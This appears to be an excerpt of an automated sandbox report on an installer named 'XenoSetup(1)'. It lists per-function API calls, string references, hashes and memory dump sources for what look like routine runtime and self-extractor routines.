Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 84b31b0bd24f207534317bef8e14f2062a0818485ffd5e9b5cf7b0cea1cc1e43
Instruction ID: 7bf21f3e0f47576e28c9056e24ed4108a6bf6ea768a52d1f553ff95303b10478
Opcode Fuzzy Hash: 84b31b0bd24f207534317bef8e14f2062a0818485ffd5e9b5cf7b0cea1cc1e43
Instruction Fuzzy Hash: C7F13C71A043C09BDB25DB2A8895BFE77DD6F90300F08057DFD859B283DB688945E7A2

Function 00FF9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FF9D0A

Strings

</p>, xrefs: 00FF9DE8
>, xrefs: 00FF9D4B
</style>, xrefs: 00FF9E52
<style>, xrefs: 00FF9E30
<br>, xrefs: 00FF9DFE

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: e10248e76129255c3e55e508c5da24bd9dffcb9c757e4c12671d082e2ab0caba
Instruction ID: 1aa7d9709fa24e84468b9183b53b7ca11f0d8792fd34a05ddd846b6010451799
Opcode Fuzzy Hash: e10248e76129255c3e55e508c5da24bd9dffcb9c757e4c12671d082e2ab0caba
Instruction Fuzzy Hash: FF51F866F4932B95DB309A159C1177A73E0DFA4770F78041AEBC18B2F0FBE58C41A265

Function 0100F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0100FE02,00000000,00000000,00000000,00000000,00000000,?), ref: 0100F6CF
__fassign.LIBCMT ref: 0100F74A
__fassign.LIBCMT ref: 0100F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0100F78B
WriteFile.KERNEL32(?,00000000,00000000,0100FE02,00000000,?,?,?,?,?,?,?,?,?,0100FE02,00000000), ref: 0100F7AA
WriteFile.KERNEL32(?,00000000,00000001,0100FE02,00000000,?,?,?,?,?,?,?,?,?,0100FE02,00000000), ref: 0100F7E3

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 4ab2a5e0c55a2dcd49ad7aa827e26ffa9dc54471ace8b0b59ea1609139ceaf8d
Instruction ID: e18f882d8e76944b7645822762045ce6ea74177b8426c9af9a6b687988073d06
Opcode Fuzzy Hash: 4ab2a5e0c55a2dcd49ad7aa827e26ffa9dc54471ace8b0b59ea1609139ceaf8d
Instruction Fuzzy Hash: 2951BBB5E0024A9FEB21CFA8D885AEDBFF4FF09310F14415AE695E7281D774A641CB50

Function 01002900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 01002937
___except_validate_context_record.LIBVCRUNTIME ref: 0100293F
_ValidateLocalCookies.LIBCMT ref: 010029C8
__IsNonwritableInCurrentImage.LIBCMT ref: 010029F3
_ValidateLocalCookies.LIBCMT ref: 01002A48

Strings

csm, xrefs: 010029DD

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 6aa7c4c4f8832dd3d521326468c48662e3d1700e2978ef22e325a3d6ff618257
Instruction ID: cefaecfbffd7cda2cbd7aa81867a3a82523c1bba8a82176b85ac0de5470b65fa
Opcode Fuzzy Hash: 6aa7c4c4f8832dd3d521326468c48662e3d1700e2978ef22e325a3d6ff618257
Instruction Fuzzy Hash: 4541C334A00209AFEF12DF68C888A9EBFF1BF45324F148095E8956B3D2D7359A51CB91

Function 00FF9ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00FF9EEE
GetWindowRect.USER32(?,00000000), ref: 00FF9F44
ShowWindow.USER32(?,00000005,00000000), ref: 00FF9FDB
SetWindowTextW.USER32(?,00000000), ref: 00FF9FE3
ShowWindow.USER32(00000000,00000005), ref: 00FF9FF9

Strings

RarHtmlClassName, xrefs: 00FF9FA5

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 60d0e726fc34768e68662c77b1022cbb0eb8c186078a1b9a7578362141527456
Instruction ID: 51dac22816424ff1184f4dcc620f8bd4ac4f417696d4cdb5617ecb967431495c
Opcode Fuzzy Hash: 60d0e726fc34768e68662c77b1022cbb0eb8c186078a1b9a7578362141527456
Instruction Fuzzy Hash: 0A410571408224AFDB215F64DD88F6B7BB8FF48311F008518FA899D1AACB78E814DB61

Function 00FF9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FF995E
_wcslen.LIBCMT ref: 00FF9993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00FF9987
, xrefs: 00FF99B0
<br>, xrefs: 00FF99DF
 , xrefs: 00FF9A21

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: c4ebec1ae922ca98a7bd81d2a0d3a00035fa6a5e95f9f51467d69b5ff53a5079
Instruction ID: ee782d738c2f52d780a085eaf04084a28b8690fc33881b281160fbad2c1ebe8e
Opcode Fuzzy Hash: c4ebec1ae922ca98a7bd81d2a0d3a00035fa6a5e95f9f51467d69b5ff53a5079
Instruction Fuzzy Hash: 67314C36A4834A56E631AB549C41BB773A4EF90730F50441EE6C29B2E0FBE9AD5093A1

Function 0100C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0100C868: _free.LIBCMT ref: 0100C891

_free.LIBCMT ref: 0100C8F2

Part of subcall function 01008DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34), ref: 01008DE2
Part of subcall function 01008DCC: GetLastError.KERNEL32(01013A34,?,0100C896,01013A34,00000000,01013A34,00000000,?,0100C8BD,01013A34,00000007,01013A34,?,0100CCBA,01013A34,01013A34), ref: 01008DF4

_free.LIBCMT ref: 0100C8FD
_free.LIBCMT ref: 0100C908
_free.LIBCMT ref: 0100C95C
_free.LIBCMT ref: 0100C967
_free.LIBCMT ref: 0100C972
_free.LIBCMT ref: 0100C97D

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 7382a0b8795207cc80ea0ee446653e209b6530c1393bdce452f3c078860a0a09
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: C8115171990B06AAF522B7B1CD05FCB7BACAF20B10F404E56B2DD660D1DA75B605C750

Function 00FFE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00FFE669,00FFE5CC,00FFE86D), ref: 00FFE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00FFE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00FFE630

Strings

ReleaseSRWLockExclusive, xrefs: 00FFE625
KERNEL32.DLL, xrefs: 00FFE600
AcquireSRWLockExclusive, xrefs: 00FFE615

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 1903bfdca92ff41395a07e51528cd5ba4bf948060f95a7ff3fa054e61f5e64c7
Instruction ID: 4ad4e2e079d578c98a81251b49192ef04afef2244aaa5b7ea4c5064399af8019
Opcode Fuzzy Hash: 1903bfdca92ff41395a07e51528cd5ba4bf948060f95a7ff3fa054e61f5e64c7
Instruction Fuzzy Hash: DBF0C272B6032E9B4B324D659D9467633C86E25B65300043EEB85DB134EB2DCC907B94

Function 00FF146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF14C2

Part of subcall function 00FEB146: GetVersionExW.KERNEL32(?), ref: 00FEB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00FF14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FF1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00FF1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00FF1533

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: dc773d469f8663d0185e591390c49c7a0cb6a6c1e1ec766d66489d2b81b7c662
Instruction ID: 79392f9d5201d51e4537b735decc51dff0d85ed4d68b5d9963ebcb9850006b2c
Opcode Fuzzy Hash: dc773d469f8663d0185e591390c49c7a0cb6a6c1e1ec766d66489d2b81b7c662
Instruction Fuzzy Hash: A531E875108345ABC704DFA8C88499BBBF8BF98754F044A1EF995C3210E734D549CBA6

Function 01002AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,01002AF1,010002FC,00FFFA34), ref: 01002B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01002B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01002B2F
SetLastError.KERNEL32(00000000,01002AF1,010002FC,00FFFA34), ref: 01002B81

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e5a107b418a22f2bb3333e75e14425f4eb82d1b6ab184a7d43565491058c437a
Instruction ID: 4442457572d73e0340f6638664d8488b857afe84651e7322209ff3c855dc9048
Opcode Fuzzy Hash: e5a107b418a22f2bb3333e75e14425f4eb82d1b6ab184a7d43565491058c437a
Instruction Fuzzy Hash: A401D432118B126EF66B29B8BC8CA6B2B99FF517B4F60073AF9D0590D4EF1A48009344

Function 010097E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,01021030,01004674,01021030,?,?,01003F73,00000050,?,01021030,00000200), ref: 010097E9
_free.LIBCMT ref: 0100981C
_free.LIBCMT ref: 01009844
SetLastError.KERNEL32(00000000,?,01021030,00000200), ref: 01009851
SetLastError.KERNEL32(00000000,?,01021030,00000200), ref: 0100985D
_abort.LIBCMT ref: 01009863

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 2b221ac9264a7f04bb3fe257d9d69d20ff90504368fceef87e6cc74b45f6fdbc
Instruction ID: 67e663843fe180278d2b4973b8151f8b606ce24c680483514d79222f63089935
Opcode Fuzzy Hash: 2b221ac9264a7f04bb3fe257d9d69d20ff90504368fceef87e6cc74b45f6fdbc
Instruction Fuzzy Hash: 06F0F935540A03A7F6673238BC04B9F1AA5AFE0B78F210125F6DC962C2EE2985018324

Function 00FFDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FFDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00FFDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FFDC72
TranslateMessage.USER32(?), ref: 00FFDC7C
DispatchMessageW.USER32(?), ref: 00FFDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00FFDC91

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: a1a8b6df85f8b1f67b141d6829855a006498879ac026b4ebc0b62d72ae7bd4a4
Instruction ID: a76e84ee637ddb8338bd3ab8dcf4d17923b707d28ee8adad3ac945711d1694b4
Opcode Fuzzy Hash: a1a8b6df85f8b1f67b141d6829855a006498879ac026b4ebc0b62d72ae7bd4a4
Instruction Fuzzy Hash: 56F08C72A00229BBCB306AA1DD4CDDF7F7DFF417A1B004121B64AD6014D63A8546C7A0

Function 00FEC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00FF05DA: _wcslen.LIBCMT ref: 00FF05E0

Part of subcall function 00FEB92D: _wcsrchr.LIBVCRUNTIME ref: 00FEB944

_wcslen.LIBCMT ref: 00FEC197
_wcslen.LIBCMT ref: 00FEC1DF

Strings

.exe, xrefs: 00FEC10B
.sfx, xrefs: 00FEC11A
.rar, xrefs: 00FEC0E1, 00FEC134

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: f97c7081e895efe8ca8c2e40df194ddba856aa64214cb2c999f1c4ff04806fe5
Instruction ID: c585a2848ce7c8d924adf757f259b55d42571af78f35850827e8614d5803f0d1
Opcode Fuzzy Hash: f97c7081e895efe8ca8c2e40df194ddba856aa64214cb2c999f1c4ff04806fe5
Instruction Fuzzy Hash: 2C4128229043D595C736AF768801A7BB3A8EF41764F14090EFAC1AB192EB584D83F3D5

Function 00FFCE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 00FFCE9D

Part of subcall function 00FEB690: _wcslen.LIBCMT ref: 00FEB696

_swprintf.LIBCMT ref: 00FFCED1

Part of subcall function 00FE4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00FE40A5

SetDlgItemTextW.USER32(?,00000066,0102946A), ref: 00FFCEF1
EndDialog.USER32(?,00000001), ref: 00FFCFFE

Strings

%s%s%u, xrefs: 00FFCEC6

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
String ID: %s%s%u
API String ID: 110358324-1360425832
Opcode ID: 075e908f95aeeec1a0ce51942e31ad960bcac30e898c355662d1e66180e0730c
Instruction ID: 6f83ff3ba21f73fb23bcb4c4a9bac19b63f2dd4117c2230f8d22b1c2380d58c7
Opcode Fuzzy Hash: 075e908f95aeeec1a0ce51942e31ad960bcac30e898c355662d1e66180e0730c
Instruction Fuzzy Hash: D84182B190026DAADF219B90CC45EFE77BCEF05310F4080A6FB49E7055EE759A449F61

Function 00FEBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00FEBB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00FEA275,?,?,00000800,?,00FEA23A,?,00FE755C), ref: 00FEBBC5
_wcslen.LIBCMT ref: 00FEBC3B

Strings

UNC, xrefs: 00FEBBA7
\\?\, xrefs: 00FEBB52, 00FEBB99, 00FEBBF7, 00FEBC4E

Memory Dump Source

Source File: 00000006.00000002.2355154868.0000000000FE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000006.00000002.2355123661.0000000000FE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355342365.0000000001013000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.000000000101E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001025000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355376796.0000000001042000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2355563676.0000000001043000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_fe0000_XenoSetup(1).jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: de1483b2fc9f7cd0f23c5087bb1e9d73db680b7d482d2222dbae5117842cb6cd
Instruction ID: 309056cca2d21103355337beca041d9b8c9f7b77e873284f67aa0ce09b61a47b
Opcode Fuzzy Hash: de1483b2fc9f7cd0f23c5087bb1e9d73db680b7d482d2222dbae5117842cb6cd
Instruction Fuzzy Hash: 5F41D73180429AA6CF22AF66CC01EEB7779BF40364F244466F554B7161EF74ED90EB50

Function 00FFB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00FFB6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00FFB712
DeleteObject.GDI32(00000000), ref: 00FFB744
DeleteObject.GDI32(00000000), ref: 00FFB767

Part of subcall function 00FFA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00FFB73D,00000066), ref: 00FFA6D5
Part of subcall function 00FFA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA6EC
Part of subcall function 00FFA6C2: LoadResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA703
Part of subcall function 00FFA6C2: LockResource.KERNEL32(00000000,?,?,?,00FFB73D,00000066), ref: 00FFA712
Part of subcall function 00FFA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00FFB73D,00000066), ref: 00FFA72D
Part of subcall function 00FFA6C2: GlobalLock.KERNEL32(00000000), ref: 00FFA73E
Part of subcall function 00FFA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00FFA762
Part of subcall function 00FFA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00FFA7A7
Part of subcall function 00FFA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00FFA7C6
Part of subcall function 00FFA6C2: GlobalFree.KERNEL32(00000000), ref: 00FFA7CD

Strings

], xrefs: 00FFB71A

Memory Dump Source

